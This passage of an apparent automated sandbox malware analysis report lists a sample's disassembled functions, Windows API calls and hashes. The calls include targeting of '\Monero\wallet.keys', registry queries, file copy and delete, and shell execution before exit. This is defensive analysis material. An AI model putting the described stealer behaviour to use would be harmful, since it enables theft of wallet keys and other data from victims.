                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: 114bbf91e6722230a2ba71bd8e534182e066fbb410c8410197ef34e79dd314be
                                    • Instruction ID: 654adc9de10677614cfab13aa487a39bc06c6dd454cd15154c63555912e256ab
                                    • Opcode Fuzzy Hash: 114bbf91e6722230a2ba71bd8e534182e066fbb410c8410197ef34e79dd314be
                                    • Instruction Fuzzy Hash: AB21EAB5D0020CABCF18EFE4E9499EEB7B5FF48300F04852AE506E3654EB745604CB69
                                    Function 00FF7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF7E37
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF7E3E
                                    • RegOpenKeyExA.ADVAPI32(80000002,017FB8F8,00000000,00020119,?), ref: 00FF7E5E
                                    • RegQueryValueExA.ADVAPI32(?,0180D828,00000000,00000000,000000FF,000000FF), ref: 00FF7E7F
                                    • RegCloseKey.ADVAPI32(?), ref: 00FF7E92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: b0c974b7876760ff61e785c8005bea5925e53070e4ed1456b7ffd70c5b7e7e7c
                                    • Instruction ID: 525e9a69f0b22cd1aa91f5d62de6365591030cd0239ef5d7f9f7be5335cd4fb5
                                    • Opcode Fuzzy Hash: b0c974b7876760ff61e785c8005bea5925e53070e4ed1456b7ffd70c5b7e7e7c
                                    • Instruction Fuzzy Hash: A9116DB2A44209BBD724DF94E949F7FFBB8FB08B10F10411AF705A7A84D7B458009BA1
                                    Function 00FF9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • StrStrA.SHLWAPI(0180E110,?,?,?,00FF140C,?,0180E110,00000000), ref: 00FF926C
                                    • lstrcpyn.KERNEL32(0122AB88,0180E110,0180E110,?,00FF140C,?,0180E110), ref: 00FF9290
                                    • lstrlen.KERNEL32(?,?,00FF140C,?,0180E110), ref: 00FF92A7
                                    • wsprintfA.USER32 ref: 00FF92C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 1f8c6e195c3db09d4d015e0e88a2a25c64a353ac61ca532aff14c98e36b34b61
                                    • Instruction ID: 158c05c28eeae2b35bf1e9154d28db6c794360484513146c059f35ade28369a5
                                    • Opcode Fuzzy Hash: 1f8c6e195c3db09d4d015e0e88a2a25c64a353ac61ca532aff14c98e36b34b61
                                    • Instruction Fuzzy Hash: 65011A75500108FFCB14DFECD988EAE7BB9FF58350F108548F90A8BA08D671AA40DBA4
                                    Function 00FE12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FE12B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FE12BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FE12D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FE12F5
                                    • RegCloseKey.ADVAPI32(?), ref: 00FE12FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 07f6d38306f522eb32d647f124e84bf676d71b336e54278b2f191b97b0510de4
                                    • Instruction ID: 145c61e0b4fa69792734d2815339e96ffbe810ca6eb60780423ef6b071046936
                                    • Opcode Fuzzy Hash: 07f6d38306f522eb32d647f124e84bf676d71b336e54278b2f191b97b0510de4
                                    • Instruction Fuzzy Hash: 3A0131B9A40208BBDB24DFE0EC4DFAEB7B8FB48701F008159FB0597684D6B19A018F50
                                    Function 00FFC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: d0744b6315cfe0c0321c9048e536cc7250774eecc50b3a97b22d22d6dc36d06e
                                    • Instruction ID: 071cf4094f82cdd92127f896497c84a7502b4db72484deb4cfb1eb59f179e245
                                    • Opcode Fuzzy Hash: d0744b6315cfe0c0321c9048e536cc7250774eecc50b3a97b22d22d6dc36d06e
                                    • Instruction Fuzzy Hash: 1D4107B150076C5EDB318B248D84BFB7BF89F05744F1444E8EACA96192E2759A44EF60
                                    Function 00FF6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00FF6663
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FF6726
                                    • ExitProcess.KERNEL32 ref: 00FF6755
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 7f4f7cac8f086c9a5b5d7b24e330a8a7286515d357a5726a856c8b9fd9a47d19
                                    • Instruction ID: 5b6858262990287725faf8e1fc6a6023c0f3a98d41d889a618996db5470a540d
                                    • Opcode Fuzzy Hash: 7f4f7cac8f086c9a5b5d7b24e330a8a7286515d357a5726a856c8b9fd9a47d19
                                    • Instruction Fuzzy Hash: 8E311CF1801218AADB24EF50DC95BEE7778AF04300F405199F30A671A1DFB86B49DF59
                                    Function 00FF87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,01000E28,00000000,?), ref: 00FF882F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF8836
                                    • wsprintfA.USER32 ref: 00FF8850
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: e8a4dd5e91ffa3390f583970b8f1a2e8dd393f48ec805dc7647f2ec99965274d
                                    • Instruction ID: bd49660326c34b4daab881e891a06b88347e749aca940d8637a8e40574a70020
                                    • Opcode Fuzzy Hash: e8a4dd5e91ffa3390f583970b8f1a2e8dd393f48ec805dc7647f2ec99965274d
                                    • Instruction Fuzzy Hash: B72103B1A40208BFDB24DF94DD49FAEB7B8FB48711F104119F605A7A84C7799901CBA5
                                    Function 00FF8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00FF951E,00000000), ref: 00FF8D5B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF8D62
                                    • wsprintfW.USER32 ref: 00FF8D78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: d54ac6c7ab1416124050321a4fed6b1cd5f251a6c670165e1bc1784aff2abbf0
                                    • Instruction ID: 5cf5d6db1a6d3437820e8f20641a6d2969775fc33d6589abcabb6a73e7004d66
                                    • Opcode Fuzzy Hash: d54ac6c7ab1416124050321a4fed6b1cd5f251a6c670165e1bc1784aff2abbf0
                                    • Instruction Fuzzy Hash: 6EE08670A40208BBD724DF94E80DE5D77B8EB04701F000054FD0987A40D9715E008B56
                                    Function 00FEA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FF8B60: GetSystemTime.KERNEL32(01000E1A,0180A988,010005AE,?,?,00FE13F9,?,0000001A,01000E1A,00000000,?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FF8B86
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FEA2E1
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 00FEA3FF
                                    • lstrlen.KERNEL32(00000000), ref: 00FEA6BC
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FEA743
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 19aa167736cfdf03469c16897a58693d2bc6a9178b7393117d13c3c660bd75c7
                                    • Instruction ID: 3a046720442a5f7e40af302200138ecc8919e5c235cccfae027cd6f76b9dfbad
                                    • Opcode Fuzzy Hash: 19aa167736cfdf03469c16897a58693d2bc6a9178b7393117d13c3c660bd75c7
                                    • Instruction Fuzzy Hash: B9E135B281010CAADB14FBA4DC95EFE7338AF14340F508169F61B720A5EF786A1DDB61
                                    Function 00FED400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FF8B60: GetSystemTime.KERNEL32(01000E1A,0180A988,010005AE,?,?,00FE13F9,?,0000001A,01000E1A,00000000,?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FF8B86
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FED481
                                    • lstrlen.KERNEL32(00000000), ref: 00FED698
                                    • lstrlen.KERNEL32(00000000), ref: 00FED6AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FED72B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: ac696179618d6a7de311441352b3ceafb2f99b82a9e797f7a48fc4010ca49180
                                    • Instruction ID: 7ca04b4cd2d07ad832a78ea2250620cf981c0d2d2c4d3f98e9d7da670495a170
